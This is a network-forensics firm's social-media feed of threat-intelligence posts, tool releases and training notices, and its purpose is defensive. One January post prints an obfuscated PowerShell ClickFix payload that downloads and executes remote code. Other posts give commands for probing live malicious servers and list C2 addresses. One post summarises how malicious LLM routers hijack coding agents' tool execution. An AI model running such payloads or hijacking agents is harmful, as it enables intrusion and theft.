Sign in

𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲

@netresec.infosec.exchange.ap.brid.gy
14 followers 2 following 171 posts

Experts in Network Forensics and Network Security Monitoring. Creators of #NetworkMiner, #CapLoader, #PolarProxy, #FlowCarp and #RawCap. #PCAP or it didn't happen! 🌉 bridged from ⁂ infosec.exchange/@netresec, follow @ap.brid.gy to interact

PostsRepliesMedia
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 07/10/2026
NetworkMiner 3.2 Released 🔑 RADIUS authentication extraction 🏭 Better OT/ICS protocol parsers for UMAS and IEC-104 📂 Improved file extraction from PCAP netresec.com/?b=26Aa0d3
netresec.com
NetworkMiner 3.2 Released
NetworkMiner 3.2 parses RADIUS authentication data and extracts more details from the OT/ICS protocols UMAS and IEC-104. The release also improves several existing protocol parsers and fixes file-reassembly issues, helping analysts extract more information from captured network traffic. OT Protocol[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 06/10/2026
Interesting analysis by Fortinet in their ClingSTUN Linux Backdoor writeup. There's a related blog post by @eFeSpain called Twelve alibis and a mailbox that concludes that only **one** of the STUN servers that the malware connects to is controlled by the threat actors, the other ones are just […]
infosec.exchange
Original post on infosec.exchange
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 06/10/2026
Your SOC deserves better alerts. FlowCarp helps uncover network activity that traditional detection may miss. netresec.com/?b=26A42c0
netresec.com
Stop Feeding the SOC Garbage
Security operations teams are handling increasing volumes of network events and security alerts. Whether those alerts are reviewed by human analysts, processed by AI, or handled through a combination of both, the result depends on the quality of the underlying detections. No SOC can investigate an i[...]
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 29/09/2026
RE: infosec.exchange/@alexandreborges/1… The NCSI service mentioned here is the "Network Connectivity Status Indicator" service, which displays a WiFi or Ethernet icon on Windows' taskbar when it discovers an internet access.
infosec.exchange
101
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 29/09/2026
A dystopian future discussed in STÖK and @Kugg’s latest podcast with Thomas “Skjortan” Olofsson: > AI agents, which are self-replicating like worms [...] finding more GPU's. Sounds a bit dystopic, but it's probably overdue already. www.youtube.com/watch?v=xn5mIBaRzWw…
011
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 29/09/2026
RE: infosec.exchange/@netresec/11735310… It's time to start blocking traffic to workers[.]dev. At least run it through a TLS-inspection proxy before forwarding it to this free malware C2 hosting platform provided by Cloudflare.
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 21/09/2026
Malware family identification is hard, especially when samples are packed, encrypted or poorly classified. FlowCarp can help identify the correct malware family and reduce alert overlap. netresec.com/?b=2692109
netresec.com
Unmasking Malware Families
Identifying malware families is hard. Malware samples are often packed, strings encrypted and configurations may only appear after several stages of execution. Even experienced reverse engineers can get the malware family wrong and commercial sandboxes do not always produce correct classifications.[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 08/09/2026
PolarProxy 2.0.2 is out! 🧦 SOCKS proxy tunneling 🅿️ Environment variable support ⌛ Improved timeouts 📜 SBOM for supply chain transparency netresec.com/?b=2692ad6
netresec.com
PolarProxy 2.0.2 Released
A few more handy features have been added to PolarProxy, our TLS inspection proxy. PolarProxy can now tunnel outgoing connections through SOCKS proxies and supports environment variables as an alternative to command-line arguments. PolarProxy also ships with a software bill of materials (SBOM), prov[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 31/08/2026
Very good point from Harlan Carvey (@keydet89) on why we shouldn’t be afraid to share IOCs and TTPs. Fast, widespread sharing of #threatintel is the best way to bring pain to your adversaries! > Something else that seems to be one of those "universal true-isms" that everyone seems to accept as […]
infosec.exchange
Original post on infosec.exchange
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 31/08/2026
OT networks still need monitoring. We examine the Polish CHP plant hack and show how better network security monitoring could have detected the attackers before they carried out destructive actions. netresec.com/?b=2686c28
netresec.com
OT Networks Still Need Monitoring
CERT Polska recently published a follow-up report detailing the hack of a Polish combined heat and power (CHP) plant in December 2025. CERT Polskas report concludes with several important recommendations, including protecting OT systems through network segmentation and monitoring traffic entering an[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 21/08/2026
New blog post: #CNCMachineRMS C2 Protocol We analyze the malware’s binary C2 protocol, DoH usage, related infrastructure and network detection opportunities. netresec.com/?b=268ee19
netresec.com
CNCMachineRMS C2 Protocol
This post describes the binary command-and-control (C2) protocol used by CNCMachineRMS, a recently identified remote access trojan (RAT). We cover how the protocol was discovered, how its infrastructure was identified, and how network defenders can detect it. Background We have been tracking a previ[...]
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 30/07/2026
Only 3 IOCs have been posted to ThreatFox for the confusing catch-all label `zgRAT` in the past 12 months. Let's clear up any issues and figure out what they actually are. `89.23.103.60:7001` is `PureRAT` `194.169.175.191:39002` is `PureMiner` (also tagged […] [Original post on infosec.exchange]
PureRAT and PureMiner traffic on ThreatFox:
2026-03-05 15:06:22	89.23.103.60:7001	zgRAT	zgrat 	PeterGabaldon
2026-02-18 07:34:51	194.169.175.191:39002	zgRAT	API-BASE64 execution NETREACTOR persistence PUREMINER zgrat 	Neiki
2025-10-16 05:38:45	196.251.86.238:56001	zgRAT	RAT zgrat 	burger
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/07/2026
zgRAT is a confusing catch-all label: both PureLogs and PureRAT commonly trigger "zgRAT" detections. Please don't use it. netresec.com/?b=267e877
netresec.com
PureLogs, PureRAT and misleading zgRAT
Please stop classifying malware as zgRAT. That malware label is confusing. As far as I know, there isnt a proper definition of what zgRAT actually is. Some claim that zgRAT is the same malware family as PureLogs, while others argue that zgRAT should be mapped to PureRAT. There is also a blog post by[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 25/06/2026
Pivoting on hashes and IPs ➡️ Ping32 RMM and ValleyRAT 👾 d43fdaa1f0ee09d7e5f0f94ee9df7b6c 📡 143.92.37.168:18987 (UDP) 👾 8266b00c4e45d728cef78b3f5a865f68 📡 143.92.37.168:10086 (UDP) netresec.com/?b=2666e31
netresec.com
Ping32 RMM and ValleyRAT
Fareed Radzi recently blogged about a malware campaign observed earlier in June by Kasperskys GReAT team. The malware campaign embedded malicious code in VBScripts, which were distributed through WhatsApp DMs. The VBScript then dropped the legitimate Remote Monitoring and Management (RMM) tool Manag[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 09/06/2026
Is this a new ValleyRAT variant from #SilverFox (银狐) or a completely new malware? Custom protocol over TCP 443. C2 traffic starts with `BFuck\0\0\0` = `42 46 75 63 6b 00 00 00` IOCs: `38.76.177.46:443` `43.99.101.175:443` tria.ge/260527-lq3gjscw4t tria.ge/260525-t6jclsdv5m
"BFuck" C2 keyword shown in CapLoader
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 08/06/2026
Maximizing IOC Impact: Advice on extracting, verifying, and sharing IOCs for fast, broad protection. netresec.com/?b=26653f3
netresec.com
Maximizing IOC Impact
Ive been thinking about threat intelligence lately. Specifically: indicators of compromise (IOC), how and where to share them to cause maximum pain to adversaries and help as many organizations as possible protect themselves. I regularly analyze malware traffic from sandboxes such as ANY.RUN, Triage[...]
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 05/06/2026
PolarProxy 2.0.1 Released 💨 Improved performance 🐞 Bug fixes ⚖️ Prioritizes PCAP output over throughput netresec.com/?b=266dc11
netresec.com
PolarProxy 2.0.1 Released
Our TLS inspection proxy PolarProxy has been updated with bug fixes, improved performance and more reliable PCAP output. The recent PolarProxy 2.0 release added musl/Alpine compatibility and support for unencrypted HTTP proxy requests. But there were a few small, yet very important, updates that unf[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/05/2026
New release of CapLoader 🫆 JA3/JA4/SNI extraction from multi-segment TLS handshakes 🚨 Alerts on IOCs from @viql's Rösti 👀 OSINT lookup on @jonasl's ScanMalware 📦 Extracts packets from more encapsulation protocols netresec.com/?b=265c041
netresec.com
CapLoader 2.1.0 Released
CapLoader has been updated to version 2.1.0. The new release comes with better JA3/JA4 extraction and integration of additional threat-intel and OSINT services. We have also added support for more encapsulation protocols. TLS Client Hello Reassembly TLS handshakes no longer reliably fit in a single[...]
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 22/05/2026
Tell me AI writes your articles without telling me AI writes your articles
Article in English with mixed in Persian text
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 18/05/2026
PolarProxy 2.0 TLS inspection proxy released 📦 Single self-contained binary release 🔀 Improved HTTP proxy 🐳 Builds for Linux musl (Alpine) ARM/ARM64 🪄 Simplified deployment netresec.com/?b=2658a26
netresec.com
PolarProxy 2.0 Released
A new major release of PolarProxy is out with a self-contained single-file binary, expanded platform support (musl/ARM), and improved container and service plumbing. PolarProxy is a transparent TLS/SSL inspection proxy built for incident responders, malware analysts and security researchers. It decr[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 08/05/2026
Viewing #remcos alerts from FlowCarp in @ish's #EveBox netresec.com/?b=2659fc0
netresec.com
Remcos Alerts from FlowCarp in EveBox
There is a wonderful little web based alert and event front-end called EveBox, which renders Eve JSON formatted data to a graphical user interface. This blog post demonstrates how EveBox can be used to show alert and flow information that FlowCarp has extracted from a Remcos malware infection. Remco[...]
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 06/05/2026
Found an odd Telnet like connection in a Mirai malware execution. Follow these steps to see for yourself: `telnet 45.149.186.18 8080` Enter: `newsrv` 🔥 nivela.duckdns[.]org:8080 🔥 45.149.186.18:8080 🔥 b8d37e1ba85e8cebd9802b31747a1689 #Mirai #OWARI
REDE GENUINAMENTE BRASILEIRA
Military Network Version 4.0 Login

Welcome Soldier Type your user and pass to login

Created by HaxStroke from ZakrytyeKupla[3ATO] Team
Username:
Password:
Sorry, You inputed incorrect information
Press Escape to exit
021
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 04/05/2026
New tool released: FlowCarp 🔍 Identifies protocols without port numbers 🔨 Build protocol detection from example traffic ➡️ Input: PCAP or PcapNG ⬅️ Output: Flows and/or Alerts netresec.com/?b=265d268 #FlowCarp
netresec.com
FlowCarp Identifies Protocols
I am thrilled to announce the release of a brand new tool called FlowCarp! FlowCarp is a simple command line tool that performs a very complicated task. It identifies the application layer protocol in network traffic without relying on port numbers, static signatures or code that tries to parse the[...]
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 15/04/2026
Researchers found 8 free and _1 paid_ (!!!) LLM routers actively injecting malicious code and one attempting to steal ETH :bitcoin: > This architecture creates a trust relationship that has received little scrutiny. The “router-in-the-middle” is not an […] [Original post on infosec.exchange]
LLM router ecosystem and taint propagation. Agent clients (left) exchange requests and responses through a multi-hop graph of LLM routers to upstream model providers (right). Each hop terminates the inbound TLS session, granting full plaintext access. Green arrows denote clean data flow; red arrows trace how a single malicious router 𝑅4, controlled by an external attacker, taints responses on the return path: corrupted payloads propagate through 𝑅1 back to the compromised Claude Code and Codex clients, handing the attacker effective control over their tool execution (“your agent is mine”), while agents routed through honest paths (e.g., 𝑅2 →𝑅5) remain unaffected.
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 02/03/2026
RE: infosec.exchange/@geraldcombs/11613… Wireshark 4.6.4 resolves 3 denial of service vulnerabilities in the following protocol dissectors: * USB HID (cve.mitre.org/cgi-bin/cvename.cgi?n…] * NTS-KE ( […]
infosec.exchange
Original post on infosec.exchange
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/02/2026
21 of the world's best intelligence and security agencies cannot be wrong... right? netresec.com/?b=26233f4
GRU unit 26165 domains:
accesscan[.]org  glize[.]com
You’ve verified them, right?
You’ve verified them, right?
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 26/02/2026
Are CISA typing out their IOC domains by hand? netresec.com/?b=26233f4
netresec.com
@netresec
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 13/02/2026
RE: infosec.exchange/@netresec/11590523… This malicious finger service on `64.190.113.206` (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running! You can probe it with: `nc 64.190.113.206 79 <<< rcaptcha` The malicious "finger" service […]
infosec.exchange
Original post on infosec.exchange
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 09/02/2026
We’ve stumbled across an unknown malware C2 protocol. Do you know what this is? 👾 47.83.173.19:5050 👾 47.84.203.73:5050 👾 xuanwcai[.]com:5050 👾 wkaiuahaaxx[.]icu:5050 Characteristic strings in C2 traffic: `Accept: */*` `frAQBc8Wsa1xVPfvJcrgRYwTiizs2tr`
Flow transcript of unknown C2 protocol.

4163 6365 7074 3a20 2a2f 2a0d 0a00 0000  Accept: */*.....
0000 0000 0000 0000 0000 0000 0000 0000  ................
0000 0000 0000 0000 0000 0000 0000 0000  ................
0000 0000 0000 0000 0000 0000 0000 0000  ................
0000 0000 0000 0000 0000 0000 0000 0000  ................
0000 0000 0000 0000 0000 0000 0000 0000  ................
0000 0000 0800 0000 6672 4151 4263 3857  ........frAQBc8W
7361 3178 5650 6676 4a63 7267 5259 7754  sa1xVPfvJcrgRYwT
6969 7a73 3274 7200 0000 0000 1662 6900  iizs2tr......bi.

6c72 4151 5401 5157 98a8                 lrAQT.QW??

0b72 4151 5401 5157 9890 77b6 78fd 6eb9  .rAQT.QW??w?x?n?
a9a4 6799 8ce2 9c9b 80a1 a8f8 88bd adbd  ??g?????????????
9fa9 b099 689c a802 9cc9 77bf 78a9 6ebf  ????h??.??w?x?n?
a9f6 6796 8ce4 9c9c 80af a8ae 88bb adbd  ??g?????????????
9ffa b091 6892 a852 9ca8 7787 7899 6e8d  ????h??R??w?x?n?
a997 67ae 8c86 9cac 8099 a89d 888f ad8a  ??g?????????????
9f9f b0a9 68aa a836 9ca8 7787 78         ????h??6??w?x

2b78 4151 5401 5157 99a8 7787 78e2 18d8  +xAQT.QW??w?
f6b6 0df9 dba8 9cc8 80f5 a8f1 88d0 ade8  ??.?????????????
9ff6 b0c7 68aa a836 9ca8 7787 7899 6e8d  ????h??6??w?x?n?
a997 67ae 8c86 9cac 8099 a89d 888f ad8a  ??g?????????????
9f9f b0a9 68aa a836 9ca8 7787 7899 6e8d  ????h??6??w?x?n?
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 05/02/2026
Erik Hjelmvik will run a hands-on network forensic workshop at the upcoming Digital Forensics Research Conference (DFRWS) in Sweden. Participants will get the chance to analyze: 🔪 Packets carved from memory dumps 🧅 Unencrypted Tor traffic […]
infosec.exchange
Original post on infosec.exchange
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 03/02/2026
RE: hachyderm.io/@joew/1160077476276353… FFS why is our blog post on China's Man-on-the-Sida attack against GitHub in the Epstein files?!
hachyderm.io
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 02/02/2026
Decoding #njRAT C2 traffic to extract screenshots, commands and transferred files netresec.com/?b=262adb9
netresec.com
@netresec
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/01/2026
Thank you for those kind words! 💜 www.linkedin.com/pulse/issue-167-ne…
NetworkMiner has been around for a long time, and it shows — in a good way.

It feels opinionated. It feels calm. It feels like a tool made by people who’ve already had a few bad days in incident response.

No hype. No buzzwords. Just packets telling you what happened.
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 26/01/2026
The early bird discount, for our live online network forensics class, expires by the end of this week. Sign up if you’d like to analyze PCAP files together with Erik Hjelmvik (creator of NetworkMiner and PolarProxy). netresec.com/?b=25A2e4f
netresec.com
@netresec
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 20/01/2026
Decoding malware C2 with #CyberChef netresec.com/?b=261f535
netresec.com
@netresec
101
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 16/01/2026
🔥 Finger service on 64.190.113.206:79 delivers malicious powershell injects after #ClickFix infections. The malicious finger service can be probed with `nc 64.190.113.206 79 <<< rcaptcha`
nc 64.190.113.206 79 <<< rcaptcha
powershell -w h $rkdxui='ur' ;set-alias bertare c$($rkdxui)l;$iotdbycmkgwfp=(853,865,865,861,807,796,796,851,870,867,868,799,860,854,867,795,865,860,861,796,798,795,861,853,861,812,864,810,799,802,848,801,802,850,851,850,794,798,799,847,805,794,801,850,798,849,794,847,806,797,847,794,849,847,847,846,804,848,850,849,799,798,846,848);$zbvxekpyng=('reicporet','get-cmdlet');$viejarku=$iotdbycmkgwfp;foreach($izxrjgkps in $viejarku){$cfyapmhros=$izxrjgkps;$peqwajiln=$peqwajiln+[char]($cfyapmhros-749);$irfsex=$peqwajiln; $fenbohdt=$irfsex};$synwaxchklt[2]=$fenbohdt;$nuhjlqt='rl';$vxqnkui=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(bertare -useb $fenbohdt)
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 05/01/2026
There's a 10% discount on our live online Network Forensics class if you sign up before January 31. 📅 Dates: February 23-26 (4 days) ⏲️ Time: 13:00 to 17:00 CET (7am to 11am EDT) 💸 Price: € 920 EUR netresec.com/?b=25A2e4f
netresec.com
@netresec
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 10/12/2025
Extracting VNC screenshots and keylog data from #Latrodectus 🕷️ BackConnect netresec.com/?b=25Cfd08
netresec.com
@netresec
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 08/12/2025
> Cloudflare's free tier is a gift to threat actors—zero upfront cost, world-class DDoS protection (yes, really), and proxy services that completely mask origin servers. Good luck tracking down the actual host when everything's bouncing through Cloudflare's edge network. This study only covers […]
infosec.exchange
Original post on infosec.exchange
103
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 05/12/2025
RE: infosec.exchange/@VirusBulletin/115… How is this #ValleyRAT? It looks, swims and quacks like #PureRAT. Here are some typical PureRAT indicators: :windows: .NET malware 🔑 TLS version is 1.0 🫆 JA3 = fc54e0d16d9764783542f0146a98b300 or 07af4aa9e4d215a5ee63f9a0a277fbe3 🫆 […]
infosec.exchange
Original post on infosec.exchange
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 01/12/2025
NetworkMiner 3.1 Released! 🔑 More usernames, passwords and hostnames extracted :terminal: Better user interface 👾 More details from malware C2 traffic netresec.com/?b=25C4039
netresec.com
@netresec
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 20/11/2025
This #StealC and #CastleRAT infection starts with a #ClickFix attack using finger to download commands from finger[.]cloudyape[.]com
Finger command injected though ClickFix attack
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 13/11/2025
Operation Endgame’s latest phase targeted the infostealer #Rhadamanthys, Remote Access Trojan #VenomRAT, and the botnet #Elysium. www.europol.europa.eu/media-press/n…
europol.europa.eu
End of the game for cybercrime infrastructure: 1025 servers taken down – Operation Endgame’s latest phase targeted the infostealer Rhadamanthys, Remote Access Trojan VenomRAT, and the botnet Elysium | Europol
Between 10 and 14 November 2025, the latest phase of Operation Endgame was coordinated from Europol’s headquarters in The Hague. The actions targeted one of the biggest infostealers (Rhadamanthys), the Remote Access Trojan VenomRAT, and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers. The main suspect for VenomRAT was also arrested in Greece on 3 November 2025.
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 06/11/2025
Monitoring for too many old indicators not only costs money, it can even inhibit detection of real intrusions. 📆 Include "last seen" date when publishing IOCs ❌ Prune old IOCs 📜 Prioritize long lived IOCs over short lived ones netresec.com/?b=25Be9dd #threatintel
netresec.com
@netresec
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 20/10/2025
New network forensics training scheduled! 📅 February 23-26, 2026 ⏲️ 13:00 to 17:00 CET (7am to 11am EDT) 🌍 Live online netresec.com/?b=25A2e4f #DFIR #training
netresec.com
@netresec
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 16/10/2025
The technical detail in this PureRAT analysis by Heejae Hwang (황희재) is fantastic! The analyzed #PureRAT sample looks very similar to the one James Northey recently blogged about for @huntress. It even uses the same C2 server 157.66.26.209:56001.
Decompiled .NET code for PureRAT showing C2 server 157.66.26.209
0x0000DAC1 = TCP port 56001
0x0000DAC2 = TCP port 56002
0x0000DAC3 = TCP port 56003
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 09/10/2025
The use of TLS is pretty much mandatory for HTTP/2, yet this #Nezha backoor POSTS HTTP/2 data over TCP port 80 without encryption! 🔥 172.245.52[.]169:80 🔥 c.mid[.]al:80 tria.ge/251009-j26bgacj7s app.any.run/tasks/952bf595-caf6-444…
CapLoader transcript of unencrypted HTTP/2 traffic from Nehza
PRI * HTTP/2.0

SM


.........
....................?.....@............
......................
...........?......??E?b?.?????.????+.KY?N?HIi?T?.A?"??E?E??_?.u?b
&=LMedz??????`+?%?@.te?M?5.?.@?????MIOj.?h.????@?%.-I??M'?????Z?f??V?D?f?+?8?o?0.WH?@?%.-I?.%?O??n7???p???J?W7<2?.?4??????
..?..........?
.Microsoft Windows 10 Pro..22H2.1AMD Ryzen 5 3500 6-Core Processor 6 Physical Core ????.(?????.0????.:.x86_64H????.R.1.13.0Z.Microsoft Basic Display Adapter
100
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 24/09/2025
Gh0stKCP is a C2 transport protocol based on KCP. It has been used by malware families such as #PseudoManuscrypt and #ValleyRAT. netresec.com/?b=259a5af
netresec.com
@netresec
001
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/08/2025
Google’s report on #UNC6384 lists this certificate as being used in C2 comms by Sogu (#PlugX variant): eca96bd74fb6b22848751e254b6dc9b8e2721f96 Here’s an @anyrun_app execution, of AdobePlugins.​exe on May 19, which runs CANONSTAGER as well as SOGU.​SEC […] [Original post on infosec.exchange]
PCAP file from https://app.any.run/tasks/ce2745eb-edac-4e62-b5a9-5d9515b88bc4 loaded in NetworkMiner 3.0 showing parameters extracted from frame 2775.
000
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec.infosec.exchange.ap.brid.gy · 27/08/2025
Google’s report on #UNC6384 lists this certificate as being used in C2 comms by Sogu (#PlugX variant): eca96bd74fb6b22848751e254b6dc9b8e2721f96 Here’s a sandbox execution, of AdobePlugins.​exe on May 19, which runs CANONSTAGER as well as SOGU.​SEC […] [Original post on infosec.exchange]
PCAP file from https://app.any.run/tasks/ce2745eb-edac-4e62-b5a9-5d9515b88bc4 loaded in NetworkMiner 3.0 showing parameters extracted from frame 2775.
000